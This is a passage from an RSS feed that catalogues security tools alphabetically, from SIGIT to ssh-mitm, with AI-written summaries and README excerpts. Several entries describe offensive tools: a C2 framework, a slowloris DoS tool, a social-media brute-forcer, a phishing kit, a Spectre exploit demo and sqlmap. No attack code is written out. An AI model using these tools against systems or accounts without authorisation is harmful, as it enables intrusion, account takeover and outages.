&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="left" style="position: relative;"&gt;
 &lt;h1&gt;SIGIT&lt;/h1&gt;
 &lt;p align="left"&gt;
 &lt;em&gt;&lt;code&gt;Simple Information Gathering Toolkit - Modular OSINT CLI&lt;/code&gt;&lt;/em&gt;
 &lt;/p&gt;</description></item><item><title>SILENTTRINITY</title><link>https://rainmana.github.io/hackyfeed/tools/byt3bl33d3r-silenttrinity/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/byt3bl33d3r-silenttrinity/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SILENTTRINITY is a modern, asynchronous, multiplayer command and control (C2) and post-exploitation framework designed for flexibility and stealth, utilizing Python 3 and the .NET Dynamic Language Runtime. It offers features such as real-time updates via Websockets, ECDHE encrypted communications, and a fully modular architecture allowing operators to customize their C2 channels and modules. The framework leverages embedded third-party .NET scripting languages for dynamic task evaluation, enhancing usability and providing capabilities akin to PowerShell without its direct use.&lt;/p&gt;</description></item><item><title>Silver</title><link>https://rainmana.github.io/hackyfeed/tools/s0md3v-silver/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/s0md3v-silver/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Silver is a mass vulnerability scanner that integrates with masscan and nmap to provide rapid, comprehensive TCP port scanning and vulnerability assessment. Notable features include resumable scanning, multi-core utilization, caching of vulnerability data, and integration with Shodan, allowing for efficient parallel processing and streamlined notifications through Slack. Its support for various input formats and customizable scanning options enhances its usability for security assessments across different environments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;
 &lt;br&gt;
 &lt;a href="https://github.com/s0md3v/Silver"&gt;&lt;img src="https://i.ibb.co/bv3rqXs/silver.png" alt="Silver"&gt;&lt;/a&gt;
 &lt;br&gt;
 Silver
 &lt;br&gt;
&lt;/h1&gt;
&lt;h4 align="center"&gt;Mass Vulnerability Scanner&lt;/h4&gt;
&lt;p align="center"&gt;
 &lt;a href="https://github.com/s0md3v/Silver/releases"&gt;
 &lt;img src="https://img.shields.io/github/release/s0md3v/Silver.svg"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/s0md3v/Silver/issues?q=is%3Aissue+is%3Aclosed"&gt;
 &lt;img src="https://img.shields.io/github/issues-closed-raw/s0md3v/Silver.svg"&gt;
 &lt;/a&gt;
&lt;/p&gt;</description></item><item><title>simple-security-toolkit</title><link>https://rainmana.github.io/hackyfeed/tools/nascentxyz-simple-security-toolkit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nascentxyz-simple-security-toolkit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Simple Security Toolkit is a collection of practical guides and checklists designed to enhance the security of smart contract development, primarily targeting early-stage protocol teams. Key features include a structured development process, audit readiness and pre-launch security checklists, and an incident response plan template, all aimed at preventing vulnerabilities and ensuring robust deployment practices. This resource is intended to streamline security preparations and foster efficient auditing processes while encouraging contributions from the community.&lt;/p&gt;</description></item><item><title>simplify</title><link>https://rainmana.github.io/hackyfeed/tools/calebfenton-simplify/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/calebfenton-simplify/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Simplify is a generic Android deobfuscator that virtually executes obfuscated apps to enhance code readability while preserving their functional behavior. It operates through a combination of smalivm, which simulates Dalvik method execution, and simplify, which optimizes execution graphs by applying techniques such as constant propagation and dead code removal. Notable features include the ability to handle various obfuscation patterns without renaming methods or classes, and a customizable execution environment to manage optimization parameters.&lt;/p&gt;</description></item><item><title>sipvicious</title><link>https://rainmana.github.io/hackyfeed/tools/enablesecurity-sipvicious/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/enablesecurity-sipvicious/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SIPVicious OSS is a comprehensive toolset designed for auditing SIP-based VoIP systems. Its primary functions include discovering SIP servers, enumerating extensions, and facilitating password cracking through various methods, making it an essential resource for penetration testing of VoIP infrastructures. Notable features include its scanning capabilities (svmap), extension identification (svwar), password cracking (svcrack), session reporting (svreport), and the ability to exploit vulnerabilities in SIP systems (svcrash).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="welcome-to-sipvicious-oss-security-tools"&gt;Welcome to SIPVicious OSS security tools&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://repository-images.githubusercontent.com/32133566/55b41300-12d9-11eb-89d8-58f60930e3fa" alt="SIPVicious mascot"&gt;&lt;/p&gt;</description></item><item><title>sitedorks</title><link>https://rainmana.github.io/hackyfeed/tools/zarcolio-sitedorks/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/zarcolio-sitedorks/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SiteDorks is a versatile tool designed for conducting advanced searches across multiple search engines like Google and Bing using predefined dork lists. It simplifies the querying process by allowing users to categorize their search terms and automate input from a default list of 629 dorkable websites. Notable features include the ability to customize searches, manage multiple domain queries easily, and access regularly updated lists for specific countries and categories.&lt;/p&gt;</description></item><item><title>skanuvaty</title><link>https://rainmana.github.io/hackyfeed/tools/esc4icescesc-skanuvaty/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/esc4icescesc-skanuvaty/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Skanuvaty is a high-performance DNS/network/port scanning tool that allows users to quickly analyze a domain by discovering its subdomains and resolving their corresponding IPs. Notable features include support for concurrent scans, with the ability to test thousands of subdomains within seconds, and the generation of a comprehensive output file in JSON format for further analysis.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="skanuvaty"&gt;Skanuvaty&lt;/h1&gt;
&lt;p&gt;Dangerously fast dns/network/port scanner, all-in-one.&lt;/p&gt;
&lt;p&gt;&lt;img src="./demo.gif" alt="Demonstration"&gt;&lt;/p&gt;
&lt;p&gt;Start with a domain, and we&amp;rsquo;ll find everything about it.&lt;/p&gt;</description></item><item><title>skidfuscator-java-obfuscator</title><link>https://rainmana.github.io/hackyfeed/tools/skidfuscatordev-skidfuscator-java-obfuscator/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/skidfuscatordev-skidfuscator-java-obfuscator/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Skidfuscator is a production-grade Java obfuscation tool that employs SSA form to enhance and obscure Java bytecode flow while maintaining execution efficiency. Its primary use case is to protect applications from reverse engineering by providing advanced obfuscation techniques, automatic dependency downloading, and an easy-to-configure command-line interface. Notable features include smart recovery, flow obfuscation, and out-of-the-box optimization.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;img src="https://github.com/user-attachments/assets/65046709-27c3-417f-8053-3a6f8d5ea29d" alt="header"&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;p align="center"&gt;
 &lt;h3 align="center"&gt;
 🗣️ Discord: https://discord.gg/QJC9g8fBU9 📚 Wiki: https://skidfuscator.dev/docs/
 &lt;/h3&gt;
 &lt;h3 align="center"&gt;
 🏢 Enterprise/Custom Version: https://skidfuscator.dev/pricing
 &lt;/h3&gt;
&lt;/p&gt;</description></item><item><title>SkyArk</title><link>https://rainmana.github.io/hackyfeed/tools/cyberark-skyark/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cyberark-skyark/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SkyArk is a cloud security tool that focuses on detecting and mitigating the threat of Cloud Shadow Admins in AWS and Azure environments through its two main scanning modules: AWStealth and AzureStealth. It identifies the most privileged cloud users and helps organizations ensure these entities are secured with best practices such as strong credentials and MFA. Notably, SkyArk enables risk assessment by uncovering hidden admin accounts that may escalate privileges if left unmanaged.&lt;/p&gt;</description></item><item><title>slowloris</title><link>https://rainmana.github.io/hackyfeed/tools/gkbrk-slowloris/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gkbrk-slowloris/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Slowloris is a Python tool designed to execute HTTP Denial of Service attacks against threaded servers by maintaining numerous open connections through periodic header transmissions, thereby exhausting the server&amp;rsquo;s thread pool. It supports SOCKS5 proxy connections for enhanced anonymity and offers various configuration options such as socket count, random user agents, and logging verbosity to customize the attack parameters. This tool is primarily used for testing the resilience of web servers against DoS attacks.&lt;/p&gt;</description></item><item><title>Smart-Contract-Auditor-Tools-and-Techniques</title><link>https://rainmana.github.io/hackyfeed/tools/shanzson-smart-contract-auditor-tools-and-techniques/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/shanzson-smart-contract-auditor-tools-and-techniques/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Smart Contract Auditor Tools and Techniques repository provides a compilation of resources and tools aimed at enhancing the security and auditing processes for smart contracts. It features a variety of transaction visualization tools, educational pathways for aspiring auditors, and various miscellaneous tools for detecting vulnerabilities, simulating attacks, and analyzing smart contract behavior across Ethereum and other EVM-compatible blockchains. Notably, it includes links to web-based platforms for on-chain investigation and defense against potential exploits, making it a critical resource for both new and experienced blockchain security professionals.&lt;/p&gt;</description></item><item><title>sn0int</title><link>https://rainmana.github.io/hackyfeed/tools/kpcyrd-sn0int/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/kpcyrd-sn0int/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; sn0int is a semi-automatic OSINT framework and package manager designed for IT security professionals and researchers to gather intelligence on targets or themselves. It facilitates the enumeration of attack surfaces by processing public information through flexible, modular analysis tools and provides features such as subdomain harvesting, IP address enrichment, login breach discovery, and social media profile analysis. Its extensible architecture allows users to create and share custom modules, enhancing its versatility in investigations.&lt;/p&gt;</description></item><item><title>Sn1per</title><link>https://rainmana.github.io/hackyfeed/tools/1n3-sn1per/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/1n3-sn1per/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Sn1per is an automated penetration testing and attack surface management tool that enhances vulnerability scanning by integrating both commercial and open-source scanners to identify hidden assets and vulnerabilities within an organization&amp;rsquo;s environment. It streamlines the security assessment process through automation, providing deep and continuous security insights suitable for organizations of all sizes. Notable features include its capability to discover and prioritize risks, saving time and resources in the vulnerability management lifecycle.&lt;/p&gt;</description></item><item><title>social-analyzer</title><link>https://rainmana.github.io/hackyfeed/tools/qeeqbox-social-analyzer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/qeeqbox-social-analyzer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Social Analyzer is an OSINT tool designed to analyze and locate a person&amp;rsquo;s profiles across over 1000 social media platforms via an API, CLI, or web application. Its primary use case includes investigating potential malicious activities like cyberbullying and misinformation dissemination through sophisticated detection modules that yield a confidence rating. Notable features include multi-profile searches, various detection techniques (such as OCR and advanced algorithms), and customizable queries for enhanced data extraction and analysis.&lt;/p&gt;</description></item><item><title>Social-Media-OSINT</title><link>https://rainmana.github.io/hackyfeed/tools/the-osint-toolbox-social-media-osint/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/the-osint-toolbox-social-media-osint/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Social-Media-OSINT is a comprehensive resource tool designed for open-source intelligence (OSINT) gathering on various social media platforms and messenger applications. Its primary use case includes providing links to tools, techniques, and methodologies for effective information extraction and analysis across platforms such as Facebook, Instagram, LinkedIn, and more. Notable features include extensive categorization of social media types and resources for advanced analytics on topics like hate speech and disinformation.&lt;/p&gt;</description></item><item><title>Social-Media-OSINT-Tools-Collection</title><link>https://rainmana.github.io/hackyfeed/tools/osintambition-social-media-osint-tools-collection/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/osintambition-social-media-osint-tools-collection/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Social-Media-OSINT-Tools-Collection is a comprehensive repository aimed at providing tools for gathering open-source intelligence (OSINT) specifically from social media platforms. Its primary use case involves enabling users to track and analyze information from various social media sites such as Facebook, Instagram, and Twitter, utilizing features like link checkers, keyword searches, and profile lookups. Notable features include monitoring public mentions, recovering accounts, and various specialized search tools that enhance intelligence gathering capabilities.&lt;/p&gt;</description></item><item><title>SocialBox-Termux</title><link>https://rainmana.github.io/hackyfeed/tools/samsesh-socialbox-termux/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/samsesh-socialbox-termux/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SocialBox-Termux is a brute-force attack framework designed for social media platforms such as Facebook, Gmail, Instagram, and Twitter. It facilitates penetration testing by automating the login attempts using various credentials, making it useful for security professionals. Notable features include compatibility with Termux on Android, easy installation via a shell script, and the ability to run under a VPN for enhanced privacy.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="socialbox-termux"&gt;SocialBox-Termux&lt;/h1&gt;
&lt;p&gt;SocialBox is a Bruteforce Attack Framework [ Facebook , Gmail , Instagram ,Twitter ] , Coded By Belahsan Ouerghi Edit By samsesh&lt;/p&gt;</description></item><item><title>SocialFish</title><link>https://rainmana.github.io/hackyfeed/tools/undeadsec-socialfish/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/undeadsec-socialfish/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SocialFish is a phishing tool primarily designed for educational purposes, allowing users to create customizable social engineering attack vectors. It features a user-friendly interface and supports Docker for easy deployment. The tool enables users to simulate phishing attacks to assess and enhance security awareness and defenses against social engineering threats.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="https://raw.githubusercontent.com/UndeadSec/SocialFishMobile/master/content/logo.png" width="200"/&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h1 align="center"&gt;SocialFish&lt;/h1&gt;
&lt;p&gt;Are you looking for SF&amp;rsquo;s mobile controller? &lt;a href="https://github.com/UndeadSec/SocialFishMobile"&gt;UndeadSec/SocialFishMobile&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Are you looking for SF&amp;rsquo;s old version(&lt;strong&gt;Ngrok integrated&lt;/strong&gt;) ? &lt;a href="https://github.com/UndeadSec/SocialFish/releases/tag/sharkNet"&gt;UndeadSec/SociaFish/&amp;hellip;/sharkNet&lt;/a&gt;&lt;/p&gt;</description></item><item><title>socid-extractor</title><link>https://rainmana.github.io/hackyfeed/tools/soxoj-socid-extractor/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/soxoj-socid-extractor/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; socid-extractor is a command-line tool and Python library designed for extracting user profile data from various social media and web platforms, storing the information in a machine-readable format. Supporting over 100 methods for different sites, it enables users to retrieve details such as usernames, links, and personal attributes, facilitating use cases in OSINT and user tracking. Notable features include the ability to skip HTTP requests for unknown URLs, batch processing options, and integration capabilities for broader investigative workflows.&lt;/p&gt;</description></item><item><title>sogen</title><link>https://rainmana.github.io/hackyfeed/tools/momo5502-sogen/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/momo5502-sogen/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Sogen is a high-performance Windows user space emulator designed for syscall-level operation, granting detailed control over process execution, particularly useful in security analysis, malware dissection, and DRM research. Notable features include advanced memory management, complete PE loading support, implemented Windows structured exception handling, a scheduled threading model, and comprehensive debugging interfaces, including GDB compatibility for seamless integration with popular debugging tools.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;
	&lt;img src="https://momo5502.com/sogen/banner.png" height="300" /&gt;
	&lt;br&gt;
	&lt;a href="https://github.com/momo5502/sogen?tab=GPL-2.0-1-ov-file"&gt;&lt;img src="https://img.shields.io/github/license/momo5502/sogen?color=00B0F8"/&gt;&lt;/a&gt;
	&lt;a href="https://github.com/momo5502/sogen/actions"&gt;&lt;img src="https://img.shields.io/github/actions/workflow/status/momo5502/sogen/build.yml?branch=main&amp;label=build"/&gt;&lt;/a&gt;
	&lt;a href="https://github.com/momo5502/sogen/issues"&gt;&lt;img src="https://img.shields.io/github/issues/momo5502/sogen?color=F8B000"/&gt;&lt;/a&gt;
	&lt;img src="https://img.shields.io/github/commit-activity/m/momo5502/sogen?color=FF3131"/&gt;
&lt;/h1&gt;
&lt;p&gt;Sogen is a high-performance Windows user space emulator that operates at syscall level, providing full control over process execution through comprehensive hooking capabilities.&lt;/p&gt;</description></item><item><title>SpecialK</title><link>https://rainmana.github.io/hackyfeed/tools/specialko-specialk/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/specialko-specialk/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Special K is a versatile tool designed for PC gaming that enhances graphics and performance through code injection. It allows users to modify game behavior by injecting its DLL into applications, supporting both local and global injection methods, which enables a wide range of visual and performance adjustments. Notable features include performance analysis tools, shader and texture modifications, and compatibility with various graphics APIs in both Windows and WINE environments.&lt;/p&gt;</description></item><item><title>spectre-attack</title><link>https://rainmana.github.io/hackyfeed/tools/eugnis-spectre-attack/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/eugnis-spectre-attack/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Spectre Attack Example repository demonstrates an exploit based on the Spectre vulnerability (CVE-2017-5753 and CVE-2017-5715), which allows attackers to read sensitive information from memory by exploiting speculative execution. The tool constructs a scenario where out-of-bounds memory reads can leak data via cache timing attacks, highlighting how seemingly safe coding practices can inadvertently increase vulnerability. Notable features include the ability to test system vulnerability, read specified memory addresses, and compile with both GCC and Visual Studio.&lt;/p&gt;</description></item><item><title>spicedb</title><link>https://rainmana.github.io/hackyfeed/tools/authzed-spicedb/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/authzed-spicedb/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SpiceDB is an open-source authorization database inspired by Google&amp;rsquo;s Zanzibar system, designed to provide scalable and secure permission checks for applications. It allows developers to define schemas, manage relationships, and conduct queries to assess user permissions on resources, addressing critical access control threats. Notable features include its relational-like structure for defining authorization models and its capability to handle complex permission queries for enhanced security management.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;
 &lt;a href="https://authzed.com#gh-dark-mode-only" target="_blank"&gt;
 &lt;img width="300" src="https://github.com/user-attachments/assets/0ebf4718-283b-4c40-b567-1d577c0a2e03" alt="spicedb logo"&gt;
 &lt;/a&gt;
 &lt;a href="https://authzed.com#gh-light-mode-only" target="_blank"&gt;
 &lt;img width="300" src="https://github.com/user-attachments/assets/577a72f9-4fdd-49f8-b1d6-e53025d219b8" alt="spicedb Logo"&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;h3 align="center"&gt;
 SpiceDB sets the standard for authorization that &lt;i&gt;scales&lt;/i&gt;.
 &lt;br/&gt;&lt;br/&gt;Scale with&lt;br/&gt;
 Traffic • Dev Velocity • Functionality • Geography
&lt;/h3&gt;
&lt;p align="center"&gt;
 &lt;a href="https://github.com/authzed/spicedb/releases"&gt;&lt;img alt="release badge" src="https://img.shields.io/github/v/release/authzed/spicedb?color=%236EC93F&amp;label=latest%20release&amp;sort=semver&amp;style=flat-square"&gt;&lt;/a&gt;
 &amp;nbsp;
 &lt;a href="https://hub.docker.com/repository/docker/authzed/spicedb" target="_blank"&gt;&lt;img alt="docker pulls badge" src="https://img.shields.io/docker/pulls/authzed/spicedb?color=%23448CE6&amp;style=flat-square"&gt;&lt;/a&gt;
 &amp;nbsp;
 &lt;a href="https://authzed.com/blog/go-ecosystem"&gt;&lt;img alt="built with Go badge" src="https://img.shields.io/badge/built_with-Go-367B99.svg?style=flat-square"&gt;&lt;/a&gt;
 &amp;nbsp;
 &lt;a href="https://app.codecov.io/gh/authzed/spicedb"&gt;&lt;img alt="coverage" src="https://img.shields.io/codecov/c/github/authzed/spicedb"&gt;&lt;/a&gt;
 &amp;nbsp;
 &lt;a href="https://www.bestpractices.dev/en/projects/6348" target="_blank"&gt;&lt;img alt="cii badge" src="https://img.shields.io/cii/percentage/6348?style=flat-square&amp;label=cii%20best%20practices&amp;color=F8D44B"&gt;&lt;/a&gt;
 &amp;nbsp;
 &lt;a href="https://securityscorecards.dev/viewer/?uri=github.com/authzed/spicedb" target="_blank"&gt;&lt;img alt="ssf badge" src="https://api.securityscorecards.dev/projects/github.com/authzed/spicedb/badge"&gt;&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SpiderSuite</title><link>https://rainmana.github.io/hackyfeed/tools/spidersuite-spidersuite/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/spidersuite-spidersuite/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SpiderSuite is an advanced cross-platform web crawling tool specifically crafted for security professionals, facilitating comprehensive web audits and vulnerability assessments. Notable features include ease of installation, user-friendly documentation, and a feature-rich environment tailored for first-time users. The tool aims to enhance security testing processes through efficient crawling capabilities.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="resources/logo.png" width=300/&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
 &lt;a href="https://github.com/spidersuite/SpiderSuite/releases" alt="GitHub release"&gt;
 &lt;img src="https://img.shields.io/github/release/spidersuite/SpiderSuite.svg" /&gt;&lt;/a&gt;
 &lt;img src="https://img.shields.io/github/downloads/spidersuite/SpiderSuite/total" alt="GitHub all releases downloads count"&gt;
 &lt;a href="https://discord.gg/7Gw4n7M2PG" alt="Discord"&gt;
 &lt;img src="https://img.shields.io/badge/chat-%20on%20Discord-blue.svg" /&gt;&lt;/a&gt;
 &lt;a href="https://twitter.com/intent/follow?screen_name=spider_suite" alt="Twitter"&gt;
 &lt;img src="https://img.shields.io/twitter/follow/spider_suite?label=follow&amp;style=social" /&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
 •
 &lt;a href="https://github.com/orgs/spidersuite/projects/1"&gt;Roadmap&lt;/a&gt; 
&lt;/p&gt;
&lt;p&gt;SpiderSuite is an advance cross-platform and multi-feature web crawler designed for security professionals.
For more information visit SpiderSuite&amp;rsquo;s &lt;a href="https://SpiderSuite.io"&gt;website&lt;/a&gt;.&lt;/p&gt;</description></item><item><title>spoilerwall</title><link>https://rainmana.github.io/hackyfeed/tools/infobyte-spoilerwall/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/infobyte-spoilerwall/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Spoilerwall is a network hardening tool that obscures open ports by serving movie spoilers whenever a scan is performed, effectively misleading potential attackers. Its primary use case is to create a deceptive environment that appears vulnerable but instead provides mundane content, deterring unwanted attention and scans. Notable features include customizable spoiler content, easy server setup, and the ability to redirect all TCP traffic to the Spoilerwall service, enhancing security through obfuscation.&lt;/p&gt;</description></item><item><title>Spoofy</title><link>https://rainmana.github.io/hackyfeed/tools/mattkeeley-spoofy/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mattkeeley-spoofy/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Spoofy is a Python-based tool designed to evaluate the spoofability of domains by analyzing their SPF and DMARC records. It features authoritative lookups with a known DNS fallback, accurate bulk processing, and a customizable spoof logic derived from real-world testing, enabling users to conduct comprehensive assessments of domain security configurations. Additionally, Spoofy offers DKIM selector enumeration via API as an optional feature, making it a valuable resource for cybersecurity assessments.&lt;/p&gt;</description></item><item><title>spray</title><link>https://rainmana.github.io/hackyfeed/tools/chainreactors-spray/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/chainreactors-spray/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SPRAY is a high-performance directory fuzzing tool designed for testing and exploiting web applications, boasting over 50% greater performance compared to similar tools like ffuf and feroxbuster. It features customizable dictionary generation based on masks or rules, dynamic filtering, extensive fingerprint recognition capabilities, and the ability to handle multiple targets efficiently with resume options for interrupted sessions. The tool seamlessly integrates with *nix command line environments, facilitating inter-operation with other cybersecurity tools.&lt;/p&gt;</description></item><item><title>sqlmap</title><link>https://rainmana.github.io/hackyfeed/tools/sqlmapproject-sqlmap/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/sqlmapproject-sqlmap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; sqlmap is an open-source penetration testing tool designed for automating the detection and exploitation of SQL injection vulnerabilities in web applications. It features a robust detection engine with capabilities such as database fingerprinting, data extraction, file system access, and command execution through out-of-band connections, making it a comprehensive tool for security professionals. The tool is compatible with Python 2.7 and 3.x, ensuring broad platform support.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="sqlmap"&gt;sqlmap &lt;img src="https://i.imgur.com/fe85aVR.png" alt=""&gt;&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml"&gt;&lt;img src="https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg" alt=".github/workflows/tests.yml"&gt;&lt;/a&gt; &lt;a href="https://www.python.org/"&gt;&lt;img src="https://img.shields.io/badge/python-2.7%7C3.x-yellow.svg" alt="Python 2.7|3.x"&gt;&lt;/a&gt; &lt;a href="https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE"&gt;&lt;img src="https://img.shields.io/badge/license-GPLv2-red.svg" alt="License"&gt;&lt;/a&gt; &lt;a href="https://x.com/sqlmap"&gt;&lt;img src="https://img.shields.io/badge/x-@sqlmap-blue.svg" alt="x"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>ssh-mitm</title><link>https://rainmana.github.io/hackyfeed/tools/ssh-mitm-ssh-mitm/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ssh-mitm-ssh-mitm/</guid><description>&lt;blockquote&gt;
